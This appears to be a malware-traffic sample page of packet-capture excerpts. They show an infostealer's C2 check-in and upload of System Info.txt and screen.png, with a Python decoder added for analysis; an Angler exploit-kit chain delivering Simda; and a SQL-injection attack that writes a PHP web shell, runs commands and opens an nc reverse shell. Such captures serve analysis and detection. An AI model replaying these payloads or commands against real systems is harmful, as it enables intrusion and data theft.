[binary zip payload of libs.zip omitted; entry names readable in this segment: api-ms-win-core-file-l2-1-0.dll, api-ms-win-core-handle-l1-1-0.dll, api-ms-win-core-heap-l1-1-0.dll, api-ms-win-core-interlocked-l1-1-0.dll, api-ms-win-core-libraryloader-l1-1-0.dll, api-ms-win-core-localization-l1-2-0.dll, api-ms-win-core-memory-l1-1-0.dll]
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
[binary body of the multipart upload omitted; the zip central directory at its tail names two entries: System Info.txt and screen.png]
--Jfbvjwj3489078yuyetu--
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true"success"
0
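
The exchange above is a two-stage check-in: the client POSTs a form field `params` carrying a base64-wrapped query string, the server answers with JSON naming what to download (sqlite3.dll, libs.zip) and where to upload, and the client follows that tasking exactly, ending with a multipart POST whose zip payload lists System Info.txt and screen.png. The Python below is an added example for this page, not the malware's or the server's code: the request body and JSON reply are copied from the capture, the OBSERVED list is built by hand from the request lines above, and the callback parameter inside the upload URL is treated as an ordinary URL (that it names the same host is an observation from this capture, not an assumption about the protocol).

```python
import base64
import json
from urllib.parse import parse_qs, urlsplit

# Check-in body and tasking reply copied from the capture above (not constructed).
CHECKIN_BODY = (
    "params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9"
    "NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw="
)
TASKING_JSON = (
    '{"url":"http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde'
    '&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate",'
    '"attachment_url":"http://31.210.171.200/gate/sqlite3.dll",'
    '"libraries":"http://31.210.171.200/gate/libs.zip",'
    '"ip":"73.135.186.44","config":{"masks":null,"loader_urls":null}}'
)

# Hand-built from the three request lines that follow the tasking reply in the capture.
OBSERVED = [
    ("GET", "31.210.171.200", "/gate/sqlite3.dll"),
    ("GET", "31.210.171.200", "/gate/libs.zip"),
    ("POST", "31.210.171.200",
     "/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde"
     "&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate"),
]


def decode_checkin(body):
    """The check-in is form-encoded with one base64 field, 'params', that wraps a second query string."""
    outer = parse_qs(body)
    inner = base64.b64decode(outer["params"][0]).decode("ascii")
    return {k: v[0] for k, v in parse_qs(inner, keep_blank_values=True).items()}


def expected_followups(tasking_json):
    """Derive the requests the bot should make next from the tasking: two downloads, then the upload."""
    t = json.loads(tasking_json)
    plan = []
    for method, key in (("GET", "attachment_url"), ("GET", "libraries"), ("POST", "url")):
        u = urlsplit(t[key])
        path = u.path + ("?" + u.query if u.query else "")
        plan.append((method, u.netloc, path))
    return plan


def tasking_hosts(tasking_json):
    """Every host the tasking points at, including the callback URL embedded in the upload target."""
    t = json.loads(tasking_json)
    hosts = {urlsplit(t[k]).netloc for k in ("url", "attachment_url", "libraries")}
    for cb in parse_qs(urlsplit(t["url"]).query).get("callback", []):
        hosts.add(urlsplit(cb).netloc)
    return sorted(hosts)


def unexplained_requests(observed, tasking_json):
    """Observed requests the tasking did not call for; a non-empty list means a stage we have not accounted for."""
    planned = set(expected_followups(tasking_json))
    return [r for r in observed if r not in planned]


if __name__ == "__main__":
    print(decode_checkin(CHECKIN_BODY))
    print(expected_followups(TASKING_JSON))
    print(tasking_hosts(TASKING_JSON))
    print(unexplained_requests(OBSERVED, TASKING_JSON))
```

Decoding params yields bot_id (a GUID with a short suffix), a 40-hex-character config_id and data=null; the ip field in the reply (73.135.186.44) is not the lab's 10.1.10.162 address, so it is presumably the egress address the server saw. Comparing the planned follow-ups with the observed requests is the quickest way to tell whether a capture contains a stage the tasking did not explain; here the two sets match exactly.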

Angler Exploit Kit (EK) Delivering Simda Banking Trojan PCAP File Download Traffic Sample

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(.A@….O..z”..D..).P.Cy…..P………….
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
E….K@…….z”..D..).P.Cy…..P….;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: [[[[[[[[[ redacted ]]]]]]]]]]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive

2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0

2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
E..(..@…….z”..D..).P.C{…5 P…y………
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 356:767, ack 95637, win 256, length 411: HTTP: GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
E…..@…….z”..D..).P.C{…5 P…Ba..GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://kiyoshi.noahsbootandshoerepair.com/closers_retrenchment_delineation/6715645798
x-flash-version: 13,0,0,182
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive


2015-03-27 11:14:48.180800 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(..@….v..z”..D..6.P…5..BDP….”……..
2015-03-27 11:14:48.181788 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [P.], seq 1:133, ack 1, win 256, length 132: HTTP: GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
E…..@…….z”..D..6.P…5..BDP…….GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
Connection: Keep-Alive
Host: kiyoshi.noahsbootandshoerepair.com

2015-03-27 11:14:48.207298 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], seq 95637:97004, ack 767, win 131, length 1367: HTTP: HTTP/1.1 200 OK
E….&@.2.X…D…z”.P.)..5 .C|.P…e…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 27 Mar 2015 15:14:48 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 52272

2015-03-27 11:14:52.508197 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [.], ack 1, win 256, length 0
E..(..@….[..z”.q…C.P=.,.u..RP….a……..
2015-03-27 11:14:52.509414 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [P.], seq 1:101, ack 1, win 256, length 100: HTTP: POST /timezone/0/0 HTTP/1.1
E…..@…….z”.q…C.P=.,.u..RP…I#..POST /timezone/0/0 HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.earthtools.org

2015-03-27 11:14:52.845296 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [.], ack 101, win 115, length 0
E..(7E@./.&..q….z”.P.Cu..R=.,iP..s….
2015-03-27 11:14:52.845577 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [P.], seq 1:696, ack 101, win 115, length 695: HTTP: HTTP/1.1 200 OK
E…7F@./.#..q….z”.P.Cu..R=.,iP..s….HTTP/1.1 200 OK
Date: Fri, 27 Mar 2015 15:14:52 GMT

2015-03-27 11:14:53.309622 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [.], ack 1, win 256, length 0
E..(..@…k…z”.%8..D.P/……SP…O………
2015-03-27 11:14:53.310410 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [P.], seq 1:126, ack 1, win 256, length 125: HTTP: POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
E…..@…j…z”.%8..D.P/……SP…X…POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.ecb.europa.eu

2015-03-27 11:14:53.478277 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], ack 126, win 457, length 0
E..(..@.9..F.%8…z”.P.D…S/…P…N…
2015-03-27 11:14:53.578255 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], seq 1:1368, ack 126, win 457, length 1367: HTTP: HTTP/1.1 200 OK
E…..@.9….%8…z”.P.D…S/…P…f…HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)

2015-03-27 11:14:58.577462 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….{..z”U.h..L.P.B.~6t..P…Ik……..
2015-03-27 11:14:58.578833 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..L.P.B.~6t..P….Y..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 216
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:14:58.579133 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 136:352, ack 1, win 256, length 216: HTTP
E…..@…….z”U.h..L.P.B..6t..P…k…SNE1dax2kTrCO0/dykZ+x8JvoeshsqxF8Bud4at1aDiBWU9qB6+uhOMFH98SexCc+vJywoAb8HQv8VDbLgLc25bZvceJUzuvnAqW58q0Pwbl5Z2luX50C3YR+Ef3gJUBFHY5k6LtQ0Uxou9+4TQEZzORJaqZn7WT9wqKE1eM8LYMnmPmnpobOT6M3r+PF5oJnTmoAQ1EthyxMm7LjPYf2g==

2015-03-27 11:14:58.778906 IP 85.25.104.159.80 > 192.168.122.34.49228: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:00.349286 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….@..z”U.h..N.P…H.1..P….i……..
2015-03-27 11:15:00.350212 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…H.1..P….R..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 172
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:00.350542 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 136:308, ack 1, win 256, length 172: HTTP
E…..@…….z”U.h..N.P…..1..P…….YD4viggOIh++07v2Um1gIx11St/8XC8saF5uX0YI4AMVOHQ25cUjc+t23u3BZI27fiaqpkXY6wVteS6MqFLJlvHwM6fGGZVitbFgc8uerOJBrGG5iaFm5jNsDn5NWX3yyd0SwE47HcjkQ1DdnT7on0O8tT20+FuDVEr4npZm0eE=

2015-03-27 11:15:00.643584 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:03.031960 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 513599, win 1368, length 0
E..(..@….K..z”U.h..N.P…{.9..P..X……….
2015-03-27 11:15:03.227353 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 308:443, ack 513599, win 1368, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…{.9..P..X….POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 256
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:03.227511 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 443:699, ack 513599, win 1368, length 256: HTTP
E..(..@….I..z”U.h..N.P…..9..P..X….GpbZQGaQgmfu/Eh0mvebAJPknXzYE1Vhzceud0DQnHPICCkYG2flJ1aMWtq5BMcqrPr7wo7Fr53uEdowJXndCecd5Aj+eFv4Wsy43MaZDqFqB2/ld1bLXKa8U5EUlr8hLOsU8Q/e3pN/wf2SWbmmm5Rci6Hw1izzlJ/rY8zpaDl3n3E2sBtF6EX0+M1Eu4cE82G4ZcE3qY2Ld94kApgQVjW/Wu5p26YOwUZB2mTcGnM0AT0qyJzKE77lTaBJkHH1

2015-03-27 11:15:03.427513 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 443, win 140, length 0

2015-03-27 11:15:09.727441 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [.], ack 1, win 256, length 0
E..(..@…….z”…..Y.P…Gv.”.P………….
2015-03-27 11:15:09.727832 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [P.], seq 1:407, ack 1, win 256, length 406: HTTP: POST /news.php HTTP/1.0
E…..@…….z”…..Y.P…Gv.”.P…….POST /news.php HTTP/1.0
Host: fasion.arunthati.co.uk
Accept: /
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 698
Content-Type: application/octet-stream

2015-03-27 11:15:21.224812 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 834:1562, ack 742017, win 2002, length 728: HTTP
E…..@…….z”U.h..N.P…..=.GP…….

2015-03-27 11:15:21.368855 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 834, win 156, length 0

2015-03-27 11:18:03.853669 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( ‘@…….z”N.k…P..;x.R..P…)………
2015-03-27 11:18:03.854165 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… (@….#..z”N.k…P..;x.R..P….x..GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:04.090363 IP 85.25.107.67.80 > 192.168.122.34.49245: Flags [S.], seq 307298518, ack 567770301, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.0.D.U.kC..z”.P.].Q..!.|…r……..W…….
2015-03-27 11:18:04.090742 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [.], ack 1, win 256, length 0
E..( )@…….z”U.kC.].P!.|..Q..P…AC……..
2015-03-27 11:18:04.091262 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [P.], seq 1:174, ack 1, win 256, length 173: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… *@…….z”U.kC.].P!.|..Q..P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: sandsofafrica.net

2015-03-27 11:18:04.218709 IP 162.244.34.133.80 > 192.168.122.34.49246: Flags [S.], seq 2988324121, ack 1071872369, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.3.<…”…z”.P.^..5.?.yq..r……..W…….
2015-03-27 11:18:04.219113 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( +@….`..z”..”..^.P?.yq..5.P…MT……..
2015-03-27 11:18:04.219642 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [P.], seq 1:171, ack 1, win 256, length 170: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… ,@…….z”..”..^.P?.yq..5.P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: koreandust.com

2015-03-27 11:18:32.826046 IP 192.168.122.34.49263 > 136.243.241.27.80: Flags [P.], seq 1:469, ack 1, win 64249, length 468: HTTP: GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
E… .@…:n..z”…..o.P..N..<1.P….w..GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in/?22504744544b4d4e4356434c5643564b0c414d4f
x-flash-version: 13,0,0,182
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in
Connection: Keep-Alive


2015-03-27 11:18:33.183843 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( .@….>..z”N.k..q.P7AB.ZEr.P………….
2015-03-27 11:18:33.184137 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… .@…….z”N.k..q.P7AB.ZEr.P…)…GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:33.217857 IP 192.168.122.34.52660 > 224.0.0.252.5355: UDP, length 22
E..2 ……4..z”…………^…………wpad…..
2015-03-27 11:18:33.280227 IP 136.243.241.27.80 > 192.168.122.34.49264: Flags [.], ack 552, win 15400, length 0
E..(..@.3………z”.P.p.%..}X-P.<(.n..

2015-03-27 11:18:33.280608 IP 136.243.241.27.80 > 192.168.122.34.49263: Flags [.], seq 12518:13885, ack 469, win 15544, length 1367: HTTP

2015-03-27 11:18:35.340582 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( .@…….z”..”..r.P…..%..P………….
2015-03-27 11:18:35.340943 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [P.], seq 1:326, ack 1, win 256, length 325: HTTP: GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
E..m .@….v..z”..”..r.P…..%..P…g…GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
Accept: /
Referer: http://newblackfridayads.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: koreandust.com
Connection: Keep-Alive

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
E…XA@.?……2
..d…P…f{J.I…..F…..
-.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
E..4.a@.@…
..d…2.P..{J.I……………
..F(-.i.
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
E….b@.@.|.
..d…2.P..{J.I……………
..F(-.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:34.210976 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 334:545, ack 996, win 244, options [nop,nop,TS val 769026434 ecr 738856], length 211: HTTP: GET /docs/shell.php?cmd=whoami HTTP/1.1
E…XC@.?……2
..d…P….{J.,………..
-.i…F(GET /docs/shell.php?cmd=whoami HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.220266 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 996:1295, ack 545, win 2078, options [nop,nop,TS val 738861 ecr 769026434], length 299: HTTP: HTTP/1.1 200 OK
E.._.c@.@…
..d…2.P..{J.,……………
..F–.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

……….+//.MI,I…..@f …
2018-10-14 12:34:34.263625 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [.], ack 1295, win 260, options [nop,nop,TS val 769026448 ecr 738861], length 0
E..4XD@.?……2
..d…P….{J.W…..S…..
-.i…F-
2018-10-14 12:34:37.227759 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 545:772, ack 1295, win 260, options [nop,nop,TS val 769027189 ecr 738861], length 227: HTTP: GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
E…XE@.?……2
..d…P….{J.W….6……
-.lu..F-GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:37.233154 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1295:1662, ack 772, win 2212, options [nop,nop,TS val 739614 ecr 769027189], length 367: HTTP: HTTP/1.1 200 OK
E….d@.@..Y
..d…2.P..{J.W…i…..,…..
..I.-.luHTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:37 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 97
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:52.294903 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1657:1941, ack 2981, win 337, options [nop,nop,TS val 769030955 ecr 742627], length 284: HTTP: GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
E..PXO@.?……2
..d…P….{J…..Q…….
-.{+..T.GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:52.307291 IP 10.1.2.100.45298 > 192.0.2.50.443: Flags [S], seq 3484359733, win 14600, options [mss 1460,sackOK,TS val 743383 ecr 0,nop,wscale 3], length 0
E.. 10.1.2.100.45298: Flags [R.], seq 0, ack 3484359734, win 0, length 0
E..(..@.?..H…2
..d………..6P…B………
2018-10-14 12:34:52.309383 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 2981:3271, ack 1941, win 2882, options [nop,nop,TS val 743383 ecr 769030955], length 290: HTTP: HTTP/1.1 200 OK
E..V.i@.@…
..d…2.P..{J………B…….
..W.-.{+HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:54:51.821265 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 1:40, ack 1, win 1825, length 39
E..O..@.@.+5
..d
..d…D….g…P..!….SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1

2018-10-14 12:54:51.827631 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1:497, ack 40, win 256, length 496
E…#.@…..
..d
..d.D..g…….P….5..SSH-2.0-PuTTY_Release_0.70
…L…U.4|..m..u~……..curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1…Wssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly
2018-10-14 12:54:51.827650 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 497:1133, ack 40, win 256, length 636
E…#.@…..
..d
..d.D..g…….P…s…1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com… none,zlib… none,zlib……………..
2018-10-14 12:54:51.827709 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 497, win 1959, length 0
E..(..@.@.+[
..d
..d…D….g…P…….
2018-10-14 12:54:51.827744 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 1133, win 2118, length 0
E..(..@.@.+Z
..d
..d…D….g..-P..F….
2018-10-14 12:54:51.828554 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 40:1024, ack 1133, win 2118, length 984
E…..@.@.’.
..d
